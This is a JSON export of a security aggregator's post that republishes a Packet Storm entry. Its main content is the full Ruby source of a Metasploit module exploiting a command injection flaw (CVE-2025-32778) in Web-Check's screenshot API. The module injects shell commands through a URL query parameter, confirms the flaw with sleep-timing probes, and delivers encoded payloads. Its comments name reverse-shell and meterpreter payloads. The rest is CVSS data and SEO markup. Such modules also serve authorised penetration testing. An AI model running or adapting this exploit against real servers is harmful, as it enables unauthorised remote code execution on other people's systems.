{"id":35284,"date":"2026-01-13T09:45:02","date_gmt":"2026-01-13T09:45:02","guid":{"rendered":"http:\/\/localhost\/?p=35284"},"modified":"2026-01-13T09:45:02","modified_gmt":"2026-01-13T09:45:02","slug":"web-check-screenshot-api-command-injection","status":"publish","type":"post","link":"https:\/\/zero.redgem.net\/?p=35284","title":{"rendered":"\ud83d\udcc4 Web-Check Screenshot API Command Injection_PACKETSTORM:213735"},"content":{"rendered":"<p>{&#8220;lastseen&#8221;:&#8221;2026-01-13T15:13:35&#8243;,&#8221;description&#8221;:&#8221;This Metasploit module exploits a command injection vulnerability in Web-Check&#8217;s \/api\/screenshot endpoint. The directChromiumScreenshot function uses childprocess.exec with unsanitized user input, allowing command injection via URL query parameters&#8230;&#8221;,&#8221;published&#8221;:&#8221;2026-01-13T00:00:00&#8243;,&#8221;modified&#8221;:&#8221;2026-01-13T00:00:00&#8243;,&#8221;type&#8221;:&#8221;packetstorm&#8221;,&#8221;title&#8221;:&#8221;\ud83d\udcc4 Web-Check Screenshot API Command Injection&#8221;,&#8221;source&#8221;:&#8221;&#8221;,&#8221;references&#8221;:&#8221;&#8221;,&#8221;id&#8221;:&#8221;PACKETSTORM:213735&#8243;,&#8221;bulletinFamily&#8221;:&#8221;exploit&#8221;,&#8221;cwe&#8221;:null,&#8221;cvelist&#8221;:[&#8220;CVE-2025-32778&#8243;],&#8221;sourceData&#8221;:&#8221;##\\n    # This module requires Metasploit: https:\/\/metasploit.com\/download\\n    # Current source: https:\/\/github.com\/rapid7\/metasploit-framework\\n    ##\\n    \\n    require &#8216;rex\/stopwatch&#8217;\\n    \\n    class MetasploitModule \\u003c Msf::Exploit::Remote\\n      Rank = ExcellentRanking\\n    \\n      include Msf::Exploit::Remote::HttpClient\\n      prepend Msf::Exploit::Remote::AutoCheck\\n    \\n      def initialize(info = {})\\n        super(\\n          update_info(\\n            info,\\n            &#8216;Name&#8217; =\\u003e &#8216;Web-Check Screenshot API Command Injection RCE&#8217;,\\n            &#8216;Description&#8217; =\\u003e %q{\\n              This module exploits a command injection vulnerability in Web-Check&#8217;s `\/api\/screenshot` endpoint.\\n              The `directChromiumScreenshot()` function uses `child_process.exec()` with unsanitized user input,\\n              allowing command injection via URL query parameters. The vulnerability was patched in commit\\n              0e4958aa10b2650d32439a799f6fc83a7cd46cef by replacing `exec()` with `execFile()`.\\n            },\\n            &#8216;Author&#8217; =\\u003e [\\n              &#8216;Valentin Lobstein \\u003cchocapikk[at]leakix.net\\u003e&#8217; # Metasploit module\\n            ],\\n            &#8216;License&#8217; =\\u003e MSF_LICENSE,\\n            &#8216;References&#8217; =\\u003e [\\n              [&#8216;CVE&#8217;, &#8216;2025-32778&#8217;],\\n              [&#8216;URL&#8217;, &#8216;https:\/\/github.com\/Lissy93\/web-check&#8217;],\\n              [&#8216;URL&#8217;, &#8216;https:\/\/github.com\/Lissy93\/web-check\/commit\/0e4958aa10b2650d32439a799f6fc83a7cd46cef&#8217;]\\n            ],\\n            &#8216;Platform&#8217; =\\u003e %w[unix linux win],\\n            &#8216;Arch&#8217; =\\u003e [ARCH_CMD],\\n            &#8216;Payload&#8217; =\\u003e {\\n              &#8216;DisableNops&#8217; =\\u003e true,\\n              &#8216;Encoder&#8217; =\\u003e &#8216;cmd\/base64&#8217;\\n            },\\n            &#8216;Targets&#8217; =\\u003e [\\n              [\\n                &#8216;Unix\/Linux Command&#8217;,\\n                {\\n                  &#8216;Platform&#8217; =\\u003e %w[unix linux],\\n                  &#8216;Arch&#8217; =\\u003e ARCH_CMD,\\n                  &#8216;Payload&#8217; =\\u003e {\\n                    &#8216;Space&#8217; =\\u003e 131068\\n                  }\\n                  # tested with cmd\/unix\/reverse_bash\\n                  # tested with cmd\/linux\/http\/x64\/meterpreter\/reverse_tcp\\n                }\\n              ],\\n              [\\n                &#8216;Windows Command&#8217;,\\n                {\\n                  &#8216;Platform&#8217; =\\u003e &#8216;win&#8217;,\\n                  &#8216;Arch&#8217; =\\u003e ARCH_CMD,\\n                  &#8216;Payload&#8217; =\\u003e {\\n                    &#8216;Space&#8217; =\\u003e 2000\\n                  }\\n                  # tested with cmd\/windows\/http\/x64\/meterpreter\/reverse_tcp\\n                }\\n              ]\\n            ],\\n            &#8216;Privileged&#8217; =\\u003e false,\\n            &#8216;DisclosureDate&#8217; =\\u003e &#8216;2025-04-12&#8217;,\\n            &#8216;DefaultTarget&#8217; =\\u003e 0,\\n            &#8216;DefaultOptions&#8217; =\\u003e {\\n              &#8216;RPORT&#8217; =\\u003e 3000\\n            },\\n            &#8216;Notes&#8217; =\\u003e {\\n              &#8216;Stability&#8217; =\\u003e [CRASH_SAFE],\\n              &#8216;Reliability&#8217; =\\u003e [REPEATABLE_SESSION],\\n              &#8216;SideEffects&#8217; =\\u003e [IOC_IN_LOGS]\\n            }\\n          )\\n        )\\n    \\n        register_options([\\n          OptString.new(&#8216;TARGETURI&#8217;, [true, &#8216;The base path to Web-Check&#8217;, &#8216;\/&#8217;])\\n        ])\\n      end\\n    \\n      def build_url(command = nil)\\n        return Faker::Internet.url if command.nil?\\n    \\n        param = Faker::Alphanumeric.alphanumeric(number: rand(4..10))\\n        \\&#8221;http:\/\/#{Faker::Internet.domain_name}?#{param}=\\\\\\&#8221;;#{command}\\\\\\&#8221;\\&#8221;\\n      end\\n    \\n      def send_screenshot_request(command = nil)\\n        url = build_url(command)\\n        send_request_cgi({\\n          &#8216;uri&#8217; =\\u003e normalize_uri(target_uri.path, &#8216;api&#8217;, &#8216;screenshot&#8217;),\\n          &#8216;method&#8217; =\\u003e &#8216;GET&#8217;,\\n          &#8216;vars_get&#8217; =\\u003e { &#8216;url&#8217; =\\u003e url }\\n        })\\n      end\\n    \\n      def check\\n        res, baseline_elapsed = Rex::Stopwatch.elapsed_time do\\n          send_screenshot_request\\n        end\\n    \\n        return CheckCode::Unknown(\\&#8221;#{peer} &#8211; No response from web service\\&#8221;) unless res\\n        return CheckCode::Safe(&#8216;Screenshot API endpoint not found&#8217;) if res.code == 404\\n    \\n        network_latency = [baseline_elapsed, 0.3].max\\n        vprint_status(\\&#8221;Testing command injection (baseline: #{baseline_elapsed.round(2)}s)\\&#8221;)\\n        sleep_tests = [2, 3, 4].map do |duration|\\n          _, elapsed = Rex::Stopwatch.elapsed_time do\\n            send_screenshot_request(\\&#8221;sleep #{duration}\\&#8221;)\\n          end\\n          threshold = duration &#8211; network_latency\\n          vprint_status(\\&#8221;Sleep #{duration}s: #{elapsed.round(2)}s (threshold: #{threshold.round(2)}s)\\&#8221;)\\n          { elapsed: elapsed, threshold: threshold }\\n        end\\n    \\n        passed_tests = sleep_tests.count { |test| test[:elapsed] \\u003e= test[:threshold] }\\n    \\n        case passed_tests\\n        when 2..3\\n          return CheckCode::Vulnerable(&#8216;Command injection vulnerability confirmed via sleep timing&#8217;)\\n        when 1\\n          return CheckCode::Detected(&#8216;Screenshot API endpoint exists and may be vulnerable&#8217;)\\n        end\\n    \\n        return CheckCode::Detected(&#8216;Screenshot API endpoint exists but RCE not confirmed&#8217;) if res.code == 200 \\u0026\\u0026 res.body.to_s.include?(&#8216;image&#8217;)\\n    \\n        CheckCode::Unknown(&#8216;Could not determine vulnerability status&#8217;)\\n      end\\n    \\n      def exploit\\n        vprint_status(&#8216;Sending payload via screenshot API&#8217;)\\n        send_screenshot_request(payload.encoded)\\n      end\\n    end&#8221;,&#8221;sourceHref&#8221;:&#8221;https:\/\/packetstorm.news\/download\/213735&#8243;,&#8221;cvss&#8221;:{&#8220;score&#8221;:9.3,&#8221;severity&#8221;:&#8221;CRITICAL&#8221;,&#8221;vector&#8221;:&#8221;CVSS:4.0\/AV:N\/AC:L\/AT:N\/PR:N\/UI:N\/VC:H\/SC:N\/VI:H\/SI:N\/VA:H\/SA:N&#8221;,&#8221;version&#8221;:&#8221;4.0&#8243;},&#8221;cvss2&#8243;:{},&#8221;cvss3&#8243;:{&#8220;version&#8221;:&#8221;&#8221;,&#8221;vectorString&#8221;:&#8221;&#8221;,&#8221;baseScore&#8221;:0,&#8221;baseSeverity&#8221;:&#8221;&#8221;,&#8221;attackVector&#8221;:&#8221;&#8221;,&#8221;attackComplexity&#8221;:&#8221;&#8221;,&#8221;privilegesRequired&#8221;:&#8221;&#8221;,&#8221;userInteraction&#8221;:&#8221;&#8221;,&#8221;scope&#8221;:&#8221;&#8221;,&#8221;confidentialityImpact&#8221;:&#8221;&#8221;,&#8221;integrityImpact&#8221;:&#8221;&#8221;,&#8221;availabilityImpact&#8221;:&#8221;&#8221;,&#8221;cvssV3&#8243;:{&#8220;version&#8221;:&#8221;&#8221;,&#8221;vectorString&#8221;:&#8221;&#8221;,&#8221;baseScore&#8221;:0,&#8221;baseSeverity&#8221;:&#8221;&#8221;,&#8221;attackVector&#8221;:&#8221;&#8221;,&#8221;attackComplexity&#8221;:&#8221;&#8221;,&#8221;privilegesRequired&#8221;:&#8221;&#8221;,&#8221;userInteraction&#8221;:&#8221;&#8221;,&#8221;scope&#8221;:&#8221;&#8221;,&#8221;confidentialityImpact&#8221;:&#8221;&#8221;,&#8221;integrityImpact&#8221;:&#8221;&#8221;,&#8221;availabilityImpact&#8221;:&#8221;&#8221;}},&#8221;href&#8221;:&#8221;https:\/\/packetstorm.news\/files\/id\/213735\/&#8221;,&#8221;category_name&#8221;:&#8221;Exploit&#8221;,&#8221;post_link&#8221;:&#8221;&#8221;,&#8221;product&#8221;:&#8221;&#8221;,&#8221;version&#8221;:&#8221;&#8221;,&#8221;vendor&#8221;:&#8221;&#8221;,&#8221;ai_description&#8221;:&#8221;&#8221;,&#8221;ai_severity&#8221;:&#8221;&#8221;,&#8221;ai_vendor&#8221;:&#8221;&#8221;,&#8221;ai_product&#8221;:&#8221;&#8221;,&#8221;ai_version&#8221;:&#8221;&#8221;,&#8221;ai_score&#8221;:0}<\/p>\n","protected":false},"excerpt":{"rendered":"<p>{&#8220;lastseen&#8221;:&#8221;2026-01-13T15:13:35&#8243;,&#8221;description&#8221;:&#8221;This Metasploit module exploits a command injection vulnerability in Web-Check&#8217;s \/api\/screenshot endpoint. The directChromiumScreenshot function uses childprocess.exec with unsanitized user input, allowing command injection via&#8230;<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[9,6,8,55,12,13,53,7,11,5],"class_list":["post-35284","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-critical","tag-cve","tag-cvss","tag-cvss-93","tag-exploit","tag-news","tag-packetstorm","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.5 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>\ud83d\udcc4 Web-Check Screenshot API Command Injection_PACKETSTORM:213735 - zero redgem<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/zero.redgem.net\/?p=35284\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"\ud83d\udcc4 Web-Check Screenshot API Command Injection_PACKETSTORM:213735 - zero redgem\" \/>\n<meta property=\"og:description\" content=\"{&#8220;lastseen&#8221;:&#8221;2026-01-13T15:13:35&#8243;,&#8221;description&#8221;:&#8221;This Metasploit module exploits a command injection vulnerability in Web-Check&#8217;s \/api\/screenshot endpoint. The directChromiumScreenshot function uses childprocess.exec with unsanitized user input, allowing command injection via...\" \/>\n<meta property=\"og:url\" content=\"https:\/\/zero.redgem.net\/?p=35284\" \/>\n<meta property=\"og:site_name\" content=\"zero redgem\" \/>\n<meta property=\"article:published_time\" content=\"2026-01-13T09:45:02+00:00\" \/>\n<meta name=\"author\" content=\"invoker\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"invoker\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"4 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=35284#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=35284\"},\"author\":{\"name\":\"invoker\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\"},\"headline\":\"\ud83d\udcc4 Web-Check Screenshot API Command Injection_PACKETSTORM:213735\",\"datePublished\":\"2026-01-13T09:45:02+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=35284\"},\"wordCount\":824,\"commentCount\":0,\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"keywords\":[\"CRITICAL\",\"CVE\",\"CVSS\",\"CVSS-9.3\",\"exploit\",\"news\",\"packetstorm\",\"Security\",\"tapic\",\"Vulnerability\"],\"articleSection\":[\"category_exploit\"],\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=35284#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=35284\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?p=35284\",\"name\":\"\ud83d\udcc4 Web-Check Screenshot API Command Injection_PACKETSTORM:213735 - zero redgem\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\"},\"datePublished\":\"2026-01-13T09:45:02+00:00\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=35284#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=35284\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=35284#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/zero.redgem.net\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"\ud83d\udcc4 Web-Check Screenshot API Command Injection_PACKETSTORM:213735\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"name\":\"zero redgem\",\"description\":\"\",\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/zero.redgem.net\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\",\"name\":\"zero redgem\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"\",\"contentUrl\":\"\",\"width\":191,\"height\":188,\"caption\":\"zero redgem\"},\"image\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\"}},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\",\"name\":\"invoker\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"caption\":\"invoker\"},\"sameAs\":[\"https:\\\/\\\/zero.redgem.net\"],\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?author=1\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"\ud83d\udcc4 Web-Check Screenshot API Command Injection_PACKETSTORM:213735 - zero redgem","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/zero.redgem.net\/?p=35284","og_locale":"en_US","og_type":"article","og_title":"\ud83d\udcc4 Web-Check Screenshot API Command Injection_PACKETSTORM:213735 - zero redgem","og_description":"{&#8220;lastseen&#8221;:&#8221;2026-01-13T15:13:35&#8243;,&#8221;description&#8221;:&#8221;This Metasploit module exploits a command injection vulnerability in Web-Check&#8217;s \/api\/screenshot endpoint. The directChromiumScreenshot function uses childprocess.exec with unsanitized user input, allowing command injection via...","og_url":"https:\/\/zero.redgem.net\/?p=35284","og_site_name":"zero redgem","article_published_time":"2026-01-13T09:45:02+00:00","author":"invoker","twitter_card":"summary_large_image","twitter_misc":{"Written by":"invoker","Est. reading time":"4 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/zero.redgem.net\/?p=35284#article","isPartOf":{"@id":"https:\/\/zero.redgem.net\/?p=35284"},"author":{"name":"invoker","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca"},"headline":"\ud83d\udcc4 Web-Check Screenshot API Command Injection_PACKETSTORM:213735","datePublished":"2026-01-13T09:45:02+00:00","mainEntityOfPage":{"@id":"https:\/\/zero.redgem.net\/?p=35284"},"wordCount":824,"commentCount":0,"publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"keywords":["CRITICAL","CVE","CVSS","CVSS-9.3","exploit","news","packetstorm","Security","tapic","Vulnerability"],"articleSection":["category_exploit"],"inLanguage":"en-US","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/zero.redgem.net\/?p=35284#respond"]}]},{"@type":"WebPage","@id":"https:\/\/zero.redgem.net\/?p=35284","url":"https:\/\/zero.redgem.net\/?p=35284","name":"\ud83d\udcc4 Web-Check Screenshot API Command Injection_PACKETSTORM:213735 - zero redgem","isPartOf":{"@id":"https:\/\/zero.redgem.net\/#website"},"datePublished":"2026-01-13T09:45:02+00:00","breadcrumb":{"@id":"https:\/\/zero.redgem.net\/?p=35284#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/zero.redgem.net\/?p=35284"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/zero.redgem.net\/?p=35284#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/zero.redgem.net\/"},{"@type":"ListItem","position":2,"name":"\ud83d\udcc4 Web-Check Screenshot API Command Injection_PACKETSTORM:213735"}]},{"@type":"WebSite","@id":"https:\/\/zero.redgem.net\/#website","url":"https:\/\/zero.redgem.net\/","name":"zero redgem","description":"","publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/zero.redgem.net\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/zero.redgem.net\/#organization","name":"zero redgem","url":"https:\/\/zero.redgem.net\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/","url":"","contentUrl":"","width":191,"height":188,"caption":"zero redgem"},"image":{"@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/"}},{"@type":"Person","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca","name":"invoker","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","caption":"invoker"},"sameAs":["https:\/\/zero.redgem.net"],"url":"https:\/\/zero.redgem.net\/?author=1"}]}},"_links":{"self":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/35284","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=35284"}],"version-history":[{"count":0,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/35284\/revisions"}],"wp:attachment":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=35284"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=35284"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=35284"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}